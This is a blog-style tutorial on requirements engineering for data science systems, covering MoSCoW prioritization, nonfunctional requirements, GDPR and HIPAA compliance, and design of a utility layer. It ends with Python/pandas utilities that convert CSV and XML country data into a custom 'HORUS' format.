I use the MoSCoW method as a prioritization technique, to indicate how important each requirement is to the business. I revisit all outstanding requirements before each development cycle, to ensure that I concentrate on the requirements with the greatest impact on the business at present; businesses evolve, and you must stay aware of their true requirements.
#### MoSCoW Options
The four options are listed below; a small coding sketch follows the list.
• Must have Requirements with the priority “must have” are critical to the current delivery cycle.
• Should have Requirements with the priority “should have” are important but not necessary to the current delivery cycle.
• Could have Requirements prioritized as “could have” are those that are desirable but not necessary, that is, nice to have to improve the user experience for the current delivery cycle.
• Won’t have Requirements with a “won’t have” priority are those identified by stakeholders as the least critical, lowest payback requests, or just not appropriate at that time in the delivery cycle.
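If requirements are tracked programmatically, the priorities map naturally onto an enumeration; a hypothetical Python sketch (names are illustrative, not a standard library):
from enum import Enum

class MoSCoW(Enum):
    MUST = "Must have"
    SHOULD = "Should have"
    COULD = "Could have"
    WONT = "Won't have"

requirement = {"id": "000001-01",
               "text": "Weekly reports available 06h00-10h00 every Monday",
               "priority": MoSCoW.MUST}
print(requirement["priority"].value)  # -> Must have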
General Functional Requirements
As a [user role] I want [goal] so that [business value] is achieved.
#### Specific Functional Requirements
The following requirements specific to data science environments will assist you in creating requirements that enable you to transform a business’s aspirations into technical descriptive requirements.
I have found these techniques highly productive in aligning requirements with my business customers, while I can easily convert or extend them for highly technical development requirements.
Data Mapping Matrix
The data mapping matrix is one of the core functional requirement recording techniques used in data science. It tracks every data item that is available in the data sources. I advise that you keep this useful matrix up to date as you progress through the processing layers.
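As a rough sketch, such a matrix can live in a simple table, one row per data item; the column names below are illustrative, echoing the country data used later in this blog:
import pandas as pd

# One row per source data item; columns show the name it carries in each layer.
matrix = pd.DataFrame([
    {"DataItem": "Country", "Source": "Country_Code.csv", "Retrieve": "CountryName"},
    {"DataItem": "ISO-M49", "Source": "Country_Code.csv", "Retrieve": "CountryNumber"},
])
print(matrix.to_string(index=False))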
Sun Models
Sun models are a requirements-mapping technique that assists you in recording requirements at a level that allows your nontechnical users to understand the intent of your analysis, while providing you with an easy transition to the detailed technical modeling of your data scientists and data engineers.
Note Over the next few pages, I will introduce several new concepts. Please read on, as the section will help in explaining the complete process.
### The Nonfunctional Requirements
Nonfunctional requirements record the precise criteria that must be used to appraise the operation of a data science ecosystem.
Accessibility Requirements
Accessibility can be viewed as the “ability to access” and benefit from some system or entity. The concept focuses on enabling access for people with disabilities, or special needs, or enabling access through assistive technology.
Assistive technology covers the following:
• Levels of blindness support: Must be able to increase font sizes or types to assist with reading for affected people
• Levels of color-blindness support: Must be able to change a color palette to match individual requirements
• Use of voice-activated commands to assist disabled people: Must be able to use voice commands for individuals that cannot type commands or use a mouse in a normal manner
### Audit and Control Requirements
Audit is the ability to investigate the use of the system and report any violations of the system's data and processing rules. Control is making sure the system is used in the manner, and by the people, for which it was approved.
An approach called role-based access control (RBAC) is the most commonly used approach to restricting system access to authorized users of your system. RBAC is an access-control mechanism formulated around roles and privileges.
The components of RBAC are role-permission, user-role, and role-role relationships that together describe the system's access policy.
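A toy sketch of those relationships (hypothetical roles and permissions, not a real access-control library):
# Role -> permissions and user -> roles mappings; access is checked via roles only.
role_permissions = {
    "data_scientist": {"read_lake", "run_model"},
    "auditor": {"read_audit_log"},
}
user_roles = {"alice": {"data_scientist"}, "bob": {"auditor"}}

def has_permission(user, permission):
    return any(permission in role_permissions.get(r, set())
               for r in user_roles.get(user, set()))

print(has_permission("alice", "run_model"))  # True
print(has_permission("bob", "run_model"))    # False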
These audit and control requirements are also compulsory, by regulations on privacy and processing. Please check with your local information officer which precise rules apply.
#### Availability Requirements
Availability is the ratio of the expected uptime of a system to the aggregate of its uptime and downtime. For example, if your business hours are between 9h00 and 17h00, and you cannot have more than 1 hour of downtime during those 8 business hours, you require 7/8 = 87.5% availability.
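A one-line helper makes the arithmetic explicit (a sketch, not part of the original requirement format):
def availability(uptime_hours, downtime_hours):
    # Percentage of time the system is up within the measured window.
    return 100.0 * uptime_hours / (uptime_hours + downtime_hours)

print(availability(7, 1))  # 87.5 (8 business hours, at most 1 hour down)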
Take note that you specify precisely at what point you expect the availability. If you are measuring at the edge of the data lake, it is highly possible that you will sustain 99.99999% availability with ease.
The distributed and fault-tolerant nature of the data lake technology would ensure a highly available data lake. But if you measure at critical points in the business, you will find that at these critical business points, the requirements are more specific for availability.
Record your requirements in the following format:
Component C will be entirely operational for P% of the time over an uninterrupted measured period of D days.
Your customers will understand this better than the general “24/7” or “business hours” terminology that I have seen used by some of my previous customers. No system can achieve these general requirement statements.
The business will also have periods of required high availability at specific times during the day, week, month, or year. An example would be that every Monday morning the data science results for the weekly meeting have to be available. This could be recorded as the following:
Weekly reports must be entirely operational for 100% of the time between 06h00 and 10h00 every Monday for each office.
Note Think what this means to a customer that has worldwide offices over several time zones. Be sure to understand every requirement fully!
The correct requirements are
• London’s weekly reports must be entirely operational for 100% of the time between 06h00 and 10h00 (Greenwich Mean Time or British Daylight Time) every Monday.
• New York’s weekly reports must be entirely operational for 100% of the time between 06h00 and 10h00 (Eastern Standard Time or Eastern Daylight Time) every Monday.
Note You can clearly see that these requirements are now more precise than the simple general requirement.
Identify single points of failure (SPOFs) in the data science solution. Ensure that you record this clearly, as SPOFs can impact many of your availability requirements indirectly.
Dependencies between components that may not be available at the same time must be recorded, and requirements specified, to reflect this availability requirement fully.
Note Be aware that recording different availability requirements for different components in the same solution is the optimum way to record these requirements.
#### Backup Requirements
A backup, or the process of backing up, refers to the archiving of the data lake and all the data science programming code, programming libraries, algorithms, and data models, with the sole purpose of restoring these to a known good state of the system, after a data loss or corruption event.
Remember: Even with the best distribution and self-healing capability of the data lake, you have to ensure that you have a regular and appropriate backup to restore. Remember a backup is only valid if you can restore it.
The merit of any system is its ability to return to a good state. This is a critical requirement.
For example, suppose that your data scientist modifies the system with a new algorithm that erroneously updates an unknown amount of the data in the data lake. Oh, yes, that silent moment before every alarm in your business goes mad! You want to be able at all times to return to a known good state via a backup.
Warning Please ensure that you can restore your backups in an effective and efficient manner. The process is backup-and-restore. Just generating backups does not ensure survival. Understand the impact it has on the business if it goes back two hours or what happens while you restore.
### Capacity, Current, and Forecast
Capacity is the ability to load, process, and store a specific quantity of data by the data science processing solution.
You must track the current and forecast the future requirements because as a data scientist, you will design and deploy many complex models that will require additional capacity to complete the processing pipelines you create during your processing cycles.
Warning I have inadvertently created models that generate several terabytes of workspace requirements, simply by setting the parameters marginally deeper than optimal. Suddenly, my model was demanding disk space at an alarming rate!
Capacity
Capacity is measured per the component's ability to consistently maintain specific levels of performance as data load demands vary in the solution. The correct way to record the requirement is: Component C will provide P% capacity for U users, each with M MB of data, during a time frame of T seconds.
Example:
The data hard drive will provide 95% capacity for 1000 users, each with 10MB of data during a time frame of 10 minutes.
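Because these requirements follow a fixed sentence pattern, they can be generated consistently from a template; the helper below is a hypothetical sketch, not an established convention:
def capacity_requirement(component, pct, users, mb_per_user, timeframe):
    # Render the capacity requirement pattern used above.
    return (f"{component} will provide {pct}% capacity for {users} users, "
            f"each with {mb_per_user} MB of data, during a time frame of {timeframe}.")

print(capacity_requirement("The data hard drive", 95, 1000, 10, "10 minutes"))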
Warning Investigate the capacity required to perform a full rebuild in one process. I advise researching new cloud on-demand capacity, for disaster recovery or capacity top-ups. I have been consulted after major incidents that crippled a company for weeks, owing to a lack of proper capacity top-up plans.
### Concurrency
Concurrency is the measure of a component's ability to maintain a specific level of performance under multiple simultaneous load conditions.
The correct way to record the requirement is: Component C will support a concurrent group of U users running predefined acceptance script S simultaneously.
Example:
The memory will support a concurrent group of 100 users running a sort algorithm of 1000 records simultaneously.
Note Concurrency is the ability to handle a subset of the total user base effectively. I have found that numerous solutions can handle substantial volumes of users with as little as 10% of the users running concurrently.
Concurrency is an important requirement to ensure an effective solution at the start. Capacity can be increased by adding extra processing resources, while concurrency normally involves complete replacements of components.
Design Tip If on average you have short-running data science algorithms, you can support a high concurrency-to-maximum-capacity ratio. But if your average running time is longer, your concurrency must be higher too. This way, you will maintain effective throughput performance.
#### Throughput Capacity
This is how many transactions the system is required to handle at peak times under specific conditions.
Storage (Memory)
This is the volume of data the system will persist in memory at runtime to sustain an effective processing solution.
Tip Remember: You can never have too much memory, or memory that is too fast.
Storage (Disk)
This is the volume of data the system stores on disk to sustain an effective processing solution.
Tip Make sure that you have a proper mix of disks, to ensure that your solutions are effective.
You will need short-term storage on fast solid-state drives to handle the while-processing capacity requirements.
Warning There are data science algorithms that produce larger data volumes during data processing than the input or output data.
The next requirement is your long-term storage. The basic rule is to plan for bigger but slower storage.
Investigate using clustered storage, whereby two or more storage servers work together to increase performance, capacity, and reliability. Clustering distributes workloads to each server and manages the transfer of workloads between servers while ensuring availability.
The use of clustered storage will benefit you in the long term, during periods of higher demand, by letting you scale out with extra equipment.
Tip Ensure that the server network is more than capable of handling any data science load. Remember: The typical data science algorithm requires massive data sets to work effectively.
The big data revolution is now bringing massive amounts of data into the processing ecosystem. So, make sure you have enough space to store any data you need.
Warning If you have a choice, do not share disk storage or networks with a transactional system. The data science will consume any spare capacity on the shared resources. It is better to have a lower performance dedicated set of resources than to share a volatile process.
#### Storage (GPU)
This is the volume of data the system will persist in GPU memory at runtime to sustain an effective parallel processing solution, using the graphical processing capacity of the solution.
A CPU consists of a limited number of cores optimized for sequential serial processing, while a GPU has a massively parallel architecture consisting of thousands of smaller, more efficient cores intended for handling massive amounts of multiple tasks simultaneously.
The big advantage is to connect an effective quantity of very high-speed memory as closely as possible to these thousands of processing units, to use this increased capacity. I am currently deploying systems such as Kinetic DB and MapD, which are GPU-based database engines.
This improves the processing of my solutions by factors of a hundred in speed. I suspect that we will see key enhancements in the capacity of these systems over the next years.
Tip Investigate a GPU processing grid for your high-performance processing. It is an effective solution with the latest technology.
#### Year-on-Year Growth Requirements
The biggest growth in capacity will be for long-term storage. These requirements are specified as how much capacity increases over a period.
The correct way to record the requirement is Component C will be responsible for the necessary growth capacity to handle additional M MB of data within a period of T.
Configuration Management
Configuration management (CM) is a systems engineering process for establishing and maintaining consistency of a product’s performance, functional, and physical attributes against requirements, design, and operational information throughout its life.
Deployment
A methodical procedure for introducing data science to all areas of an organization is required. Investigate how to achieve practical continuous deployment of the data science models. These skills are much in demand, as the process models change more frequently as the business adopts new processing techniques.
Documentation
Data science requires a set of documentation to support the story behind the algorithms. I will explain the documentation required at each stage of the processing pipeline.
Disaster Recovery
Disaster recovery (DR) involves a set of policies and procedures to enable the recovery or continuation of vital technology infrastructure and systems following a natural or human-induced disaster.
### Efficiency (Resource Consumption for Given Load)
Efficiency is the ability to accomplish a job with a minimum expenditure of time and effort. As a data scientist, you are required to understand the efficiency curve of each of your modeling techniques and algorithms. As I suggested before, you must practice with your tools at different scales.
Tip If it works at a sample 100,000 data points, try 200,000 data points or 500,000 data points. Make sure you understand the scaling dynamics of your tools.
### Effectiveness (Resulting Performance in Relation to Effort)
Effectiveness is the ability to accomplish a purpose; producing the precise intended or expected result from the ecosystem.
As a data scientist, you are required to understand the effectiveness of each of your modeling techniques and algorithms. You must ensure that the process performs only the desired processing and has no negative side effects.
Extensibility
Extensibility is the ability to add extra features and carry customizations forward at next-version upgrades within the data science ecosystem. The data science solution must always be capable of being extended to support new requirements.
### Failure Management
Failure management is the ability to identify the root cause of a failure and then successfully record all the relevant details for future analysis and reporting.
I have found that most of the tools I would include in my ecosystem have adequate fault management and reporting capability already built into their native internal processing.
Tip I found it takes a simple but well-structured set of data science processes to wrap the individual failure logs into a proper failure-management system. Apply normal data science to it, as if it is just one more data source.
I always stipulate the precise expected process steps required when a failure of any component of the ecosystem is experienced during data science processing.
Acceptance script S completes and reports every one of the X faults it generates.
As a data scientist, you are required to log any failures of the system, to ensure that no unwanted side effects are generated that may cause a detrimental impact to your customers.
### Fault Tolerance
Fault tolerance is the ability of the data science ecosystem to handle faults in the system’s processing. In simple terms, no single event must be able to stop the ecosystem from continuing the data science processing.
Here, I normally stipulate the precise operating system monitoring, measuring, and management requirements within the ecosystem, when faults are recorded.
Acceptance script S withstands the X faults it generates.
As a data scientist, you are required to ensure that your data science algorithms can handle faults and recover from them in an orderly manner.
### Latency
Latency is the time it takes to get the data from one part of the system to another. This is highly relevant in the distributed environment of the data science ecosystems.
Acceptance script S completes within T seconds on an unloaded system and within T2 seconds on a system running at maximum capacity, as defined in the concurrency requirement.
Tip Remember: There is also an internal latency between components that make up the ecosystem that is not directly accessible to users. Make sure you also note these in your requirements.
### Interoperability
Insist on a precise ability to share data between different computer systems under this section.
Explain in detail what system must interact with what other systems. I normally investigate areas such as communication protocols, locations of servers, operating systems for different subcomponents, and the now-important end user’s Internet access criteria.
Warning Be precise with requirements, as open-ended interoperability can cause unexpected complications later in the development cycle.
Maintainability
Insist on a precise period during which a specific component is kept in a specified state. Describe precisely how changes to functionalities, repairs, and enhancements are applied while keeping the ecosystem in a known good state.
### Modifiability
Stipulate the exact amount of change the ecosystem must support for each layer of the solution.
Tip State what the limits are for specific layers of the solution. If the database can only support 2024 fields to a table, share that information!
### Network Topology
Stipulate and describe the detailed network communication requirements within the ecosystem for processing. Also, state the expected communication to the outside world, to drive successful data science.
Note Owing to the high impact on network traffic from several distributed data science algorithms processing, it is required that you understand and record the network necessary for the ecosystem to operate at an acceptable level.
Privacy
I suggest listing the exact privacy laws and regulations that apply to this ecosystem. Make sure you record the specific laws and regulations that apply. Seek legal advice if you are unsure.
This is a hot topic worldwide, as you will process and store other people’s data and execute algorithms against this data. As a data scientist, you are responsible for your actions.
Warning Remember: A privacy violation will result in a fine!
Tip I hold liability insurance against legal responsibility claims for the data I process.
Quality
Specify rigorous measures for faults discovered, faults delivered, and fault-removal efficiency at all levels of the ecosystem. Remember: Data quality is a functional requirement. This is a nonfunctional requirement that states the quality of the ecosystem, not the data flowing through it.
### Recovery/Recoverability
The ecosystem must have a clear-cut mean time to recovery (MTTR) specified. The MTTR for specific layers and components in the ecosystem must be separately specified. I typically measure in hours, but for extra-critical systems, I measure in minutes or even seconds.
Reliability
The ecosystem must have a precise mean time between failures (MTBF). This measurement of availability is specified in a pre-agreed unit of time. I normally measure in hours, but there are extra-sensitive systems that are best measured in years.
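MTBF and MTTR combine into the steady-state availability discussed earlier, via availability = MTBF / (MTBF + MTTR); a small sketch:
def steady_state_availability(mtbf_hours, mttr_hours):
    # Fraction of time the system is up, given mean time between failures
    # and mean time to recovery.
    return mtbf_hours / (mtbf_hours + mttr_hours)

print(round(steady_state_availability(720.0, 2.0), 5))  # ~0.99723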
Resilience
Resilience is the capability to deliver and preserve a tolerable level of service when faults and issues to normal operations generate complications for the processing. The ecosystem must have a defined ability to return to the original form and position in time, regardless of the issues it has to deal with during processing.
#### Resource Constraints
Resource constraints are the physical requirements of all the components of the ecosystem. The areas of interest are processor speed, memory, disk space, and network bandwidth, plus, normally, several other factors specified by the tools that you deploy into the ecosystem.
Tip Discuss these requirements with your system’s engineers. This is not normally the area in which data scientists work.
Reusability
Reusability is the use of pre-built processing solutions in the data science ecosystem development process. The reuse of preapproved processing modules and algorithms is highly advised in the general processing of data for the data scientists. The requirement here is that you use approved and accepted standards to validate your own results.
Warning I always advise that you use methodologies and algorithms that have proven lineage. An approved algorithm will guarantee acceptance by the business. Do not use unproven ideas!
### Scalability
Scalability is how you get the data science ecosystem to adapt to your requirements. I use three scalability models in my ecosystem: horizontal, vertical, and dynamic (on-demand).
Horizontal scalability increases capacity in the data science ecosystem through more separate resources, to improve performance and provide high availability (HA). The ecosystem grows by scaling out, adding more servers to the data science cluster of resources.
Tip Horizontal scalability is the proven way to handle full-scale data science ecosystems.
Warning Not all models and algorithms can scale horizontally. Test them first.
I would counsel against making assumptions.
Vertical scalability increases capacity by adding more resources (more memory or an additional CPU) to an individual machine.
Warning Make sure that you size your data science building blocks correctly at the start, as vertical scaling of clusters can get expensive and complex to swap at later stages.
Dynamic (on-demand) scalability increases capacity by adding more resources, using either public or private cloud capability, which can be increased and decreased on a pay-as-you-go model.
This is a hybrid model using a core set of resources that is the minimum footprint of the system, with additional burst agreements to cover any planned or even unplanned extra scalability increases in capacity that the system requires.
I’d like to discuss scalability for your power users. Traditionally, I would have suggested high-specification workstations, but I have found that you will serve them better by providing them access to a flexible horizontal scalability on-demand environment.
This way, they use what they need during peak periods of processing but share the capacity with others when they do not require the extra processing power.
Security
One of the most important nonfunctional requirements is security. I specify security requirements at three levels.
Privacy
I would specifically note requirements that specify protection for sensitive information within the ecosystem. Types of privacy requirements to note include data encryption for database tables and policies for the transmission of data to third parties.
Tip Sources for privacy requirements are legislative or corporate. Please consult your legal experts.
### Physical
I would specifically note requirements for the physical protection of the system. Include physical requirements such as power, elevated floors, extra server cooling, fire prevention systems, and cabinet locks.
Warning Some of the high-performance workstations required to process data science have stringent power requirements, so ensure that your data scientists are in a preapproved environment, to avoid overloading the power grid.
Access
I purposely specify detailed access requirements with defined account types/groups and their precise access rights.
Tip I use role-based access control (RBAC) to regulate access to data science resources, based on the roles of individual users within the ecosystem rather than on their individual names. This way, I can simply move a role to a new person, without any changes to the security profile.
Testability
International standard IEEE 1233-1998 states that testability is the “degree to which a requirement is stated in terms that permit the establishment of test criteria and performance of tests to determine whether those criteria have been met.” In simple terms, if your requirements are not testable, do not accept them.
Remember A lower degree of testability results in increased test effort. I have spent too many nights creating tests for requirements that are unclear.
Following is a series of suggestions, based on my experience.
### Controllability
Knowing the precise degree to which I can control the state of the code under test, as required for testing, is essential.
The algorithms used by data science are not always controllable, as they include random start points to speed the process. Running distributed algorithms is not easy to deal with, as the distribution of the workload is not under your control.
Isolate Ability
The specific degree to which I can isolate the code under test will drive most of the possible testing. A process such as deep learning is inherently hard to isolate, so do not accept requirements that you cannot test because you cannot isolate them.
Understandability
I have found that most algorithms have undocumented "extra features" or, in simple terms, "gotcha" states. The degree to which the algorithms under test are documented directly impacts the testability of requirements.
### Automatability
I have found the degree to which I can automate testing of the code directly impacts the effective and efficient testing of the algorithms in the ecosystem. I am an enthusiast of known result inline testing.
I add code to my algorithms that tests specific sub-sections, to ensure that the new code has not altered the previously verified code.
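A minimal example of such a known-result inline test (the function under test is a stand-in):
def sort_algorithm(values):
    # Stand-in for the algorithm under test.
    return sorted(values)

# Known-result inline test: a previously verified input/output pair.
_known_input = [3, 1, 2]
_known_output = [1, 2, 3]
assert sort_algorithm(_known_input) == _known_output, "Regression: verified result changed"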
#### Common Pitfalls with Requirements
I just want to list a sample of common pitfalls I have noted while performing data science for my customer base. If you are already aware of these pitfalls, well done!
Many seem obvious; however, I regularly work on projects in which these pitfalls have cost my clients millions of dollars before I was hired. So, let’s look at some of the more common pitfalls I encounter regularly.
Weak Words
Weak words are subjective or lack a common or precise definition. The following are examples in which weak words are included and identified:
• Users must easily access the system.
What is “easily”?
• Use reliable technology.
What is “reliable”?
• State-of-the-art equipment
What is “state-of-the-art”?
• Reports must run frequently.
What is “frequently”?
• User-friendly report layouts
What is “user-friendly”?
• The system must be secure.
What is "secure"?
• All data must be immediately reported.
What is “all”? What is “immediately”?
I could add many more examples. But you get the common theme. Make sure the wording of your requirements is precise and specific. I have lamentably come to understand that various projects end in disaster, owing to weak words.
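These checks are easy to automate; a minimal sketch that flags the weak words above in a requirement sentence (the word list is illustrative and should be extended for your own projects):
import re

WEAK_WORDS = {"easily", "reliable", "state-of-the-art", "frequently",
              "user-friendly", "secure", "all", "immediately"}

def flag_weak_words(requirement):
    # Return the weak words found in the requirement text, if any.
    words = re.findall(r"[A-Za-z-]+", requirement.lower())
    return sorted(WEAK_WORDS.intersection(words))

print(flag_weak_words("Users must easily access the system."))  # ['easily']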
#### Unbounded Lists
An unbounded list is an incomplete list of items. Examples include the following:
Accessible at least from London and New York.
Do I connect only London to New York? What about the other 20 branches?
Including, but not limited to, London and New York offices must have access.
So, is the New Delhi office not part of the solution?
Make sure your lists are complete and precise. This prevents later issues caused by requirements being misunderstood.
Implicit Collections
When collections of objects within requirements are not explicitly defined, you or your team will assume an incorrect meaning. See the following example:
The solution must support TCP/IP and other network protocols supported by existing users with Linux.
• What is meant by “existing user”?
• What belongs to the collection of “other network protocols”?
• What are the specific protocols of TCP/IP included?
• “Linux” is a collection of operating systems from a number of vendors, with many versions and even revisions. Do you support all the different versions or only one of them?
Make sure your collections are explicit and precise. This prevents later issues from requirements being misunderstood.
Ambiguity
Ambiguity occurs when a word within the requirement has multiple meanings.
Examples are listed following.
Vagueness
The system must pass between 96% and 100% of the test cases using current standards for data science.
What are the “current standards”? This is an example of an unclear requirement!
Subjectivity
The report must easily and seamlessly integrate with the websites.
“Easily” and “seamlessly” are highly subjective terms where testing is concerned.
Optionality
The solution should be tested under as many hardware conditions as possible.
“As possible” makes this requirement optional. What if it fails testing on every hardware setup? Is that okay with your customer?
Under-specification
The solution must support Hive 2.1 and other database versions.
Do other database versions only include other Hive databases, or also others such as HBase version 1.0 and Oracle version 10i?
### Under-reference
Users must be able to complete all previously defined reports in less than three minutes 90% of the day.
What are these “previously defined” reports? This is an example of an unclear requirement.
#### Engineering a Practical Business Layer
Any source code or other supplementary material referenced by me in this blog is available to readers on GitHub, via this blog's product page, located at www.apress.com/9781484230534.
The business layer follows general business analysis and project management principles. I suggest that a practical business layer consist of a minimum of three primary structures.
For the business layer, I suggest using a directory structure such as ./VKHCG/05-DS/5000-BL. This enables you to keep your solutions clean and tidy for a successful interaction with a standard version-control system.
Requirements
Every requirement must be recorded with full version control, in a requirement-per-file manner. I suggest a numbering scheme of 000000-00, which supports up to a million requirements with up to a hundred versions of each requirement.
### Requirements Registry
Keep a summary registry of all requirements in one single file, to assist with searching for specific requirements. I suggest you have columns for the requirement number, MoSCoW priority, a short description, date created, date of last version, and status. I normally use the following status values:
• In-Development
• In-Production
• Retired
The register acts as a control for the data science environment’s requirements.
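A minimal sketch of the numbering scheme and registry described above (column values are illustrative):
import pandas as pd

def requirement_id(number, version):
    # 000000-00: up to a million requirements, a hundred versions each.
    return f"{number:06d}-{version:02d}"

registry = pd.DataFrame([{
    "Requirement": requirement_id(1, 1),
    "MoSCoW": "Must have",
    "Description": "Weekly reports available 06h00-10h00 Monday",
    "Created": "2019-01-07",
    "LastVersion": "2019-01-07",
    "Status": "In-Development",
}])
print(registry.to_string(index=False))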
Traceability Matrix
Create a traceability matrix between each requirement and the data science processes you developed, to ensure that you know which data science process supports which requirement. This ensures that you have complete control of the environment. Changes are easy if you know how everything interconnects.
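At its simplest, the matrix is a mapping from requirement numbers to the data science processes that implement them; the process names below are hypothetical:
# Requirement id -> data science processes that implement it.
traceability = {
    "000001-01": ["Retrieve-CSV-Country", "Report-Weekly"],
    "000002-01": ["Retrieve-XML-Country"],
}

def processes_for(requirement):
    return traceability.get(requirement, [])

print(processes_for("000001-01"))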
Utility Layer
The utility layer is used to store repeatable practical methods of data science. The objective of this blog is to define how the utility layer is used in the ecosystem.
Utilities are the common and verified workhorses of the data science ecosystem. The utility layer is a central storehouse for keeping all one's solution utilities in one place.
Having a central store for all utilities ensures that you do not use out-of-date or duplicate algorithms in your solutions. The most important benefit is that you can use stable algorithms across your solutions.
Tip Collect all your utilities (including source code) in one central place. Keep records on all versions for future reference.
If you use algorithms, I suggest that you keep any proof and credentials that show that the process is a high-quality, industry-accepted algorithm. Hard experience has taught me that you are likely to be tested, making it essential to prove that your science is 100% valid.
The additional value is the capability of larger teams to work on the same project and know that each data scientist or engineer is working to identical standards. In several industries, it is a regulated requirement to use only sanctioned algorithms.
On May 25, 2018, the European Union's General Data Protection Regulation (GDPR) went into effect. The GDPR has the following rules:
You must have valid consent as a legal basis for processing. For any utilities you use, it is crucial to test for consent.
You must assure transparency, with clear information about what data is collected and how it is processed. Utilities must generate complete audit trails of all their activities.
You must support the right to accurate personal data. Utilities must use only the latest, accurate data.
You must support the right to have personal data erased. Utilities must support the removal of all information on a specific person. I will also discuss what happens if the "right to be forgotten" is requested.
Warning The “right to be forgotten” is a request that demands that you remove a person(s) from all systems immediately. Noncompliance with such a request will result in a fine.
This sounds easy at first, but take warning from my experiences and ensure that this request is implemented with care.
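As a naive illustration only, an erasure step over a tabular store might look like the sketch below; a real implementation must also cover backups, logs, and downstream copies (the column name is assumed):
import pandas as pd

def erase_person(df, person_id, id_column="PersonID"):
    # Remove every row for the given person and report how many were dropped.
    before = len(df)
    df = df[df[id_column] != person_id].copy()
    print(f"Erased {before - len(df)} rows for {person_id}")
    return df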
You must have the approval to move data between service providers.
I advise you to make sure you have 100% approval to move data between data providers. If you move the data from your customer's systems to your own systems without clear approval, both you and your customer may be in trouble with the law.
You must support the right not to be subject to a decision based solely on automated processing.
This item is the subject of debate in many meetings that I attend. By the nature of what we as data scientists perform, we are conducting, more or less, a form of profiling. The actions of our utilities support decisions from our customers. The use of approved algorithms in our utilities makes compliance easier.
Warning Noncompliance with GDPR might incur fines of 4% of global turnover. Demonstrate compliance by maintaining a record of all data processing activities.
In France, you must use only approved health processing rules from the National Health Data Institute. Processing of any personal health data is prohibited without the provision of an individual’s explicit consent.
In the United States, the Health Insurance Portability and Accountability Act of 1996 (HIPAA) guides any processing of health data.
Warning Noncompliance with HIPAA could incur fines of up to $50,000 per violation.
I suggest you investigate the rules and conditions for processing any data you handle. In addition, I advise you to get your utilities certified, to show compliance. Discuss with your chief data officer which procedures are used and which prohibited procedures require checking.
### Basic Utility Design
The basic utility must have a common layout to enable future reuse and enhancements. This standard makes the utilities more flexible and effective to deploy in a large-scale ecosystem. I use a basic design for a processing utility, building it as a three-stage process:
1. Load data as per input agreement.
2. Apply the processing rules of the utility.
3. Save data as per output agreement.
The main advantage of this methodology in the data science ecosystem is that you can build a rich set of utilities that all your data science algorithms require. That way, you have a basic pre-validated set of tools to perform the common processing and can then spend time only on the custom portions of the project. You can also enhance the processing capability of your entire project collection with one single new utility update.
Note I spend more than 80% of my non-project work time designing new utilities and algorithms to improve my delivery capability.
I suggest that you start your utility layer with a small utility set that you know works well and build the set out as you go along. In this blog, I will guide you through utilities I have found to be useful over my years of performing data science. I have split the utilities across the various layers of the ecosystem, to assist you in connecting each specific utility to specific parts of the other blogs.
#### There are three types of utilities
• Data processing utilities
• Maintenance utilities
• Processing utilities
## Data Processing Utilities
Data processing utilities are grouped together because they perform some form of data transformation within the solutions.
### Retrieve Utilities
Utilities for this superstep contain the processing chains for retrieving data out of the raw data lake into a new structured format. I suggest that you build all your retrieve utilities to transform the external raw data lake format into the Homogeneous Ontology for Recursive Uniform Schema (HORUS) data format that I have been using in my projects.
HORUS is my core data format. It is used by my data science framework to reduce the development work required to achieve a complete solution that handles all data formats. If you prefer, create your own format, but feel free to use mine.
For demonstration purposes, I have selected the HORUS format to be CSV-based. I would normally use a JSON-based Hadoop ecosystem, or a distributed database such as Cassandra, to hold the core HORUS format.
Tip Check the sample directory C:\VKHCG\05-DS\9999-Data\ for the subsequent code and data.
I recommend the following retrieve utilities as a good start.
### Text-Delimited to HORUS
These utilities enable your solution to import text-based data from your raw data sources.
Example: This utility imports a list of countries in CSV file format into HORUS format.
# Utility Start CSV to HORUS =================================
# Standard Tools
#=============================================================
import pandas as pd
# Input Agreement ============================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/Country_Code.csv'
InputData=pd.read_csv(sInputFileName, encoding="latin-1")
print('Input Data Values ===================================')
print(InputData)
print('=====================================================')
# Processing Rules ===========================================
ProcessData=InputData
# Remove columns ISO-2-Code and ISO-3-CODE
ProcessData.drop('ISO-2-CODE', axis=1, inplace=True)
ProcessData.drop('ISO-3-Code', axis=1, inplace=True)
# Rename Country and ISO-M49
ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True)
ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True)
# Set new Index
ProcessData.set_index('CountryNumber', inplace=True)
# Sort data by CountryName
ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True)
print('Process Data Values =================================')
print(ProcessData)
print('=====================================================')
# Output Agreement ===========================================
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-CSV-Country.csv'
OutputData.to_csv(sOutputFileName, index=False)
print('CSV to HORUS - Done')
# Utility done ===============================================
### XML to HORUS
These utilities enable your solution to import XML-based data from your raw data sources.
Example: This utility imports a list of countries in XML file format into HORUS format.
# Utility Start XML to HORUS =================================
# Standard Tools
#=============================================================
import pandas as pd
import xml.etree.ElementTree as ET
#=============================================================
def df2xml(data):
    header = data.columns
    root = ET.Element('root')
    for row in range(data.shape[0]):
        entry = ET.SubElement(root, 'entry')
        for index in range(data.shape[1]):
            schild = str(header[index])
            # SubElement already attaches the child to the entry.
            child = ET.SubElement(entry, schild)
            if str(data[schild][row]) != 'nan':
                child.text = str(data[schild][row])
            else:
                child.text = 'n/a'
    result = ET.tostring(root)
    return result

def xml2df(xml_data):
    root = ET.XML(xml_data)
    all_records = []
    for i, child in enumerate(root):
        record = {}
        for subchild in child:
            record[subchild.tag] = subchild.text
        all_records.append(record)
    return pd.DataFrame(all_records)
# Input Agreement ============================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/Country_Code.xml'
InputData = open(sInputFileName).read()
print('Input Data Values ===================================')
print(InputData)
print('=====================================================')
# Processing Rules ===========================================
ProcessDataXML=InputData
# XML to Data Frame
ProcessData=xml2df(ProcessDataXML)
# Remove columns ISO-2-Code and ISO-3-CODE
ProcessData.drop('ISO-2-CODE', axis=1, inplace=True)
ProcessData.drop('ISO-3-Code', axis=1, inplace=True)
# Rename Country and ISO-M49
ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True)
ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True)
# Set new Index
ProcessData.set_index('CountryNumber', inplace=True)
# Sort data by CountryName
ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True)
print('Process Data Values =================================')
print(ProcessData)
print('=====================================================')
# Output Agreement ===========================================
OutputData=ProcessData
